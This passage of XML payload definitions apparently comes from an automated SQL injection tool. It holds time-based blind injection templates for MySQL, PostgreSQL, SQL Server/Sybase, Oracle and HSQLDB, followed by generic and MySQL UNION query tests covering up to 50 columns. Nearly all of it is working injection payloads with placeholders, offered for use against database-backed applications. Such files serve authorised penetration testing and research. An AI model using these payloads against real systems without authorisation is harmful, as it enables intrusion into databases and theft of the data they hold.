    <test>        <title>HSQLDB > 2.0 time-based blind - Parameter replace (heavy query)</title>        <stype>5</stype>        <level>5</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</vector>        <request>            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>HSQLDB</dbms>            <dbms_version>> 2.0</dbms_version>        </details>    </test>    <!-- End of time-based boolean tests - Parameter replace -->
    <!-- Time-based boolean tests - ORDER BY, GROUP BY clause -->    <test>        <title>MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause</title>        <stype>5</stype>        <level>3</level>        <risk>1</risk>        <clause>2,3</clause>        <where>1</where>        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>        <request>            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>            <dbms_version>>= 5.0.12</dbms_version>        </details>    </test>
    <test>        <title>MySQL &lt;= 5.0.11 time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>        <stype>5</stype>        <level>4</level>        <risk>2</risk>        <clause>2,3</clause>        <where>1</where>        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>        <request>            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>MySQL</dbms>            <dbms_version>&lt;= 5.0.11</dbms_version>        </details>    </test>
    <test>        <title>PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause</title>        <stype>5</stype>        <level>3</level>        <risk>1</risk>        <clause>2,3</clause>        <where>1</where>        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))</vector>        <request>            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>PostgreSQL</dbms>            <dbms_version>> 8.1</dbms_version>        </details>    </test>
    <test>        <title>PostgreSQL time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>        <stype>5</stype>        <level>4</level>        <risk>2</risk>        <clause>2,3</clause>        <where>1</where>        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))</vector>        <request>            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>PostgreSQL</dbms>        </details>    </test>
    <test>        <title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clause</title>        <stype>5</stype>        <level>3</level>        <risk>1</risk>        <clause>2,3</clause>        <where>1</where>        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>        <request>            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>Microsoft SQL Server</dbms>            <dbms>Sybase</dbms>            <os>Windows</os>        </details>    </test>
    <test>        <title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)</title>        <stype>5</stype>        <level>4</level>        <risk>2</risk>        <clause>2,3</clause>        <where>1</where>        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>        <request>            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Microsoft SQL Server</dbms>            <dbms>Sybase</dbms>            <os>Windows</os>        </details>    </test>
    <test>        <title>Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)</title>        <stype>5</stype>        <level>3</level>        <risk>1</risk>        <clause>2,3</clause>        <where>1</where>        <vector>,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</vector>        <request>            <payload>,(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>Oracle</dbms>        </details>    </test>
    <test>        <title>Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)</title>        <stype>5</stype>        <level>3</level>        <risk>1</risk>        <clause>2,3</clause>        <where>1</where>        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>        <request>            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>Oracle</dbms>        </details>    </test>
    <test>        <title>Oracle time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>        <stype>5</stype>        <level>4</level>        <risk>2</risk>        <clause>2,3</clause>        <where>1</where>        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>        <request>            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Oracle</dbms>        </details>    </test>
    <test>        <title>HSQLDB >= 1.7.2 time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>        <stype>5</stype>        <level>4</level>        <risk>2</risk>        <clause>2,3</clause>        <where>1</where>        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>        <request>            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>HSQLDB</dbms>            <dbms_version>>= 1.7.2</dbms_version>        </details>    </test>            <test>        <title>HSQLDB > 2.0 time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>        <stype>5</stype>        <level>4</level>        <risk>2</risk>        <clause>2,3</clause>        <where>1</where>        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</vector>        <request>            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>HSQLDB</dbms>            <dbms_version>> 2.0</dbms_version>        </details>    </test>    <!-- TODO: if possible, add payload for Microsoft Access -->    
<!-- End of time-based boolean tests - ORDER BY, GROUP BY clause --></root>

union_query

<?xml version="1.0" encoding="UTF-8"?>
<root>    <!-- UNION query tests -->    <test>        <title>Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>        <stype>6</stype>        <level>1</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>[CHAR]</char>            <columns>[COLSTART]-[COLSTOP]</columns>        </request>        <response>            <union/>        </response>    </test>
    <test>        <title>Generic UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>        <stype>6</stype>        <level>1</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>NULL</char>            <columns>[COLSTART]-[COLSTOP]</columns>        </request>        <response>            <union/>        </response>    </test>
    <test>        <title>Generic UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)</title>        <stype>6</stype>        <level>3</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>[RANDNUM]</char>            <columns>[COLSTART]-[COLSTOP]</columns>        </request>        <response>            <union/>        </response>    </test>
    <test>        <title>Generic UNION query ([CHAR]) - 1 to 10 columns</title>        <stype>6</stype>        <level>1</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>[CHAR]</char>            <columns>1-10</columns>        </request>        <response>            <union/>        </response>    </test>
    <test>        <title>Generic UNION query (NULL) - 1 to 10 columns</title>        <stype>6</stype>        <level>1</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>NULL</char>            <columns>1-10</columns>        </request>        <response>            <union/>        </response>    </test>
    <test>        <title>Generic UNION query ([RANDNUM]) - 1 to 10 columns</title>        <stype>6</stype>        <level>3</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>[RANDNUM]</char>            <columns>1-10</columns>        </request>        <response>            <union/>        </response>    </test>
    <test>        <title>Generic UNION query ([CHAR]) - 11 to 20 columns</title>        <stype>6</stype>        <level>2</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>[CHAR]</char>            <columns>11-20</columns>        </request>        <response>            <union/>        </response>    </test>
    <test>        <title>Generic UNION query (NULL) - 11 to 20 columns</title>        <stype>6</stype>        <level>2</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>NULL</char>            <columns>11-20</columns>        </request>        <response>            <union/>        </response>    </test>
    <test>        <title>Generic UNION query ([RANDNUM]) - 11 to 20 columns</title>        <stype>6</stype>        <level>3</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>[RANDNUM]</char>            <columns>11-20</columns>        </request>        <response>            <union/>        </response>    </test>
    <test>        <title>Generic UNION query ([CHAR]) - 21 to 30 columns</title>        <stype>6</stype>        <level>3</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>[CHAR]</char>            <columns>21-30</columns>        </request>        <response>            <union/>        </response>    </test>
    <test>        <title>Generic UNION query (NULL) - 21 to 30 columns</title>        <stype>6</stype>        <level>3</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>NULL</char>            <columns>21-30</columns>        </request>        <response>            <union/>        </response>    </test>
    <test>        <title>Generic UNION query ([RANDNUM]) - 21 to 30 columns</title>        <stype>6</stype>        <level>4</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>[RANDNUM]</char>            <columns>21-30</columns>        </request>        <response>            <union/>        </response>    </test>
    <test>        <title>Generic UNION query ([CHAR]) - 31 to 40 columns</title>        <stype>6</stype>        <level>4</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>[CHAR]</char>            <columns>31-40</columns>        </request>        <response>            <union/>        </response>    </test>
    <test>        <title>Generic UNION query (NULL) - 31 to 40 columns</title>        <stype>6</stype>        <level>4</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>NULL</char>            <columns>31-40</columns>        </request>        <response>            <union/>        </response>    </test>
    <test>        <title>Generic UNION query ([RANDNUM]) - 31 to 40 columns</title>        <stype>6</stype>        <level>5</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>[RANDNUM]</char>            <columns>31-40</columns>        </request>        <response>            <union/>        </response>    </test>
    <test>        <title>Generic UNION query ([CHAR]) - 41 to 50 columns</title>        <stype>6</stype>        <level>5</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>[CHAR]</char>            <columns>41-50</columns>        </request>        <response>            <union/>        </response>    </test>    <test>        <title>Generic UNION query (NULL) - 41 to 50 columns</title>        <stype>6</stype>        <level>5</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>NULL</char>            <columns>41-50</columns>        </request>        <response>            <union/>        </response>    </test>
    <test>        <title>Generic UNION query ([RANDNUM]) - 41 to 50 columns</title>        <stype>6</stype>        <level>5</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>-- </comment>            <char>[RANDNUM]</char>            <columns>41-50</columns>        </request>        <response>            <union/>        </response>    </test>
    <test>        <title>MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>        <stype>6</stype>        <level>1</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>#</comment>            <char>[CHAR]</char>            <columns>[COLSTART]-[COLSTOP]</columns>        </request>        <response>            <union/>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>MySQL UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>        <stype>6</stype>        <level>1</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>#</comment>            <char>NULL</char>            <columns>[COLSTART]-[COLSTOP]</columns>        </request>        <response>            <union/>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>MySQL UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)</title>        <stype>6</stype>        <level>3</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>#</comment>            <char>[RANDNUM]</char>            <columns>[COLSTART]-[COLSTOP]</columns>        </request>        <response>            <union/>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>MySQL UNION query ([CHAR]) - 1 to 10 columns</title>        <stype>6</stype>        <level>1</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>#</comment>            <char>[CHAR]</char>            <columns>1-10</columns>        </request>        <response>            <union/>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>MySQL UNION query (NULL) - 1 to 10 columns</title>        <stype>6</stype>        <level>1</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>#</comment>            <char>NULL</char>            <columns>1-10</columns>        </request>        <response>            <union/>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>MySQL UNION query ([RANDNUM]) - 1 to 10 columns</title>        <stype>6</stype>        <level>3</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>#</comment>            <char>[RANDNUM]</char>            <columns>1-10</columns>        </request>        <response>            <union/>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>MySQL UNION query ([CHAR]) - 11 to 20 columns</title>        <stype>6</stype>        <level>2</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>#</comment>            <char>[CHAR]</char>            <columns>11-20</columns>        </request>        <response>            <union/>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>MySQL UNION query (NULL) - 11 to 20 columns</title>        <stype>6</stype>        <level>2</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>#</comment>            <char>NULL</char>            <columns>11-20</columns>        </request>        <response>            <union/>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>MySQL UNION query ([RANDNUM]) - 11 to 20 columns</title>        <stype>6</stype>        <level>3</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>#</comment>            <char>[RANDNUM]</char>            <columns>11-20</columns>        </request>        <response>            <union/>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>MySQL UNION query ([CHAR]) - 21 to 30 columns</title>        <stype>6</stype>        <level>3</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>#</comment>            <char>[CHAR]</char>            <columns>21-30</columns>        </request>        <response>            <union/>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>MySQL UNION query (NULL) - 21 to 30 columns</title>        <stype>6</stype>        <level>3</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>#</comment>            <char>NULL</char>            <columns>21-30</columns>        </request>        <response>            <union/>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>
        <title>MySQL UNION query ([RANDNUM]) - 21 to 30 columns</title>
        <stype>6</stype>
        <level>4</level>
        <risk>1</risk>
        <clause>1,2,3,4,5</clause>
        <where>1</where>
        <vector>[UNION]</vector>
        <request>
            <payload/>
            <comment>#</comment>
            <char>[RANDNUM]</char>
            <columns>21-30</columns>
        </request>
        <response>
            <union/>
        </response>
        <details>
            <dbms>MySQL</dbms>
        </details>
    </test>
    <test>
        <title>MySQL UNION query ([CHAR]) - 31 to 40 columns</title>
        <stype>6</stype>
        <level>4</level>
        <risk>1</risk>
        <clause>1,2,3,4,5</clause>
        <where>1</where>
        <vector>[UNION]</vector>
        <request>
            <payload/>
            <comment>#</comment>
            <char>[CHAR]</char>
            <columns>31-40</columns>
        </request>
        <response>
            <union/>
        </response>
        <details>
            <dbms>MySQL</dbms>
        </details>
    </test>
    <test>
        <title>MySQL UNION query (NULL) - 31 to 40 columns</title>
        <stype>6</stype>
        <level>4</level>
        <risk>1</risk>
        <clause>1,2,3,4,5</clause>
        <where>1</where>
        <vector>[UNION]</vector>
        <request>
            <payload/>
            <comment>#</comment>
            <char>NULL</char>
            <columns>31-40</columns>
        </request>
        <response>
            <union/>
        </response>
        <details>
            <dbms>MySQL</dbms>
        </details>
    </test>
    <test>
        <title>MySQL UNION query ([RANDNUM]) - 31 to 40 columns</title>
        <stype>6</stype>
        <level>5</level>
        <risk>1</risk>
        <clause>1,2,3,4,5</clause>
        <where>1</where>
        <vector>[UNION]</vector>
        <request>
            <payload/>
            <comment>#</comment>
            <char>[RANDNUM]</char>
            <columns>31-40</columns>
        </request>
        <response>
            <union/>
        </response>
        <details>
            <dbms>MySQL</dbms>
        </details>
    </test>
    <test>
        <title>MySQL UNION query ([CHAR]) - 41 to 50 columns</title>
        <stype>6</stype>
        <level>5</level>
        <risk>1</risk>
        <clause>1,2,3,4,5</clause>
        <where>1</where>
        <vector>[UNION]</vector>
        <request>
            <payload/>
            <comment>#</comment>
            <char>[CHAR]</char>
            <columns>41-50</columns>
        </request>
        <response>
            <union/>
        </response>
        <details>
            <dbms>MySQL</dbms>
        </details>
    </test>
    <test>
        <title>MySQL UNION query (NULL) - 41 to 50 columns</title>
        <stype>6</stype>
        <level>5</level>
        <risk>1</risk>
        <clause>1,2,3,4,5</clause>
        <where>1</where>
        <vector>[UNION]</vector>
        <request>
            <payload/>
            <comment>#</comment>
            <char>NULL</char>
            <columns>41-50</columns>
        </request>
        <response>
            <union/>
        </response>
        <details>
            <dbms>MySQL</dbms>
        </details>
    </test>
    <test>
        <title>MySQL UNION query ([RANDNUM]) - 41 to 50 columns</title>
        <stype>6</stype>
        <level>5</level>
        <risk>1</risk>
        <clause>1,2,3,4,5</clause>
        <where>1</where>
        <vector>[UNION]</vector>
        <request>
            <payload/>
            <comment>#</comment>
            <char>[RANDNUM]</char>
            <columns>41-50</columns>
        </request>
        <response>
            <union/>
        </response>
        <details>
            <dbms>MySQL</dbms>
        </details>
    </test>
    <!-- End of UNION query tests -->
</root>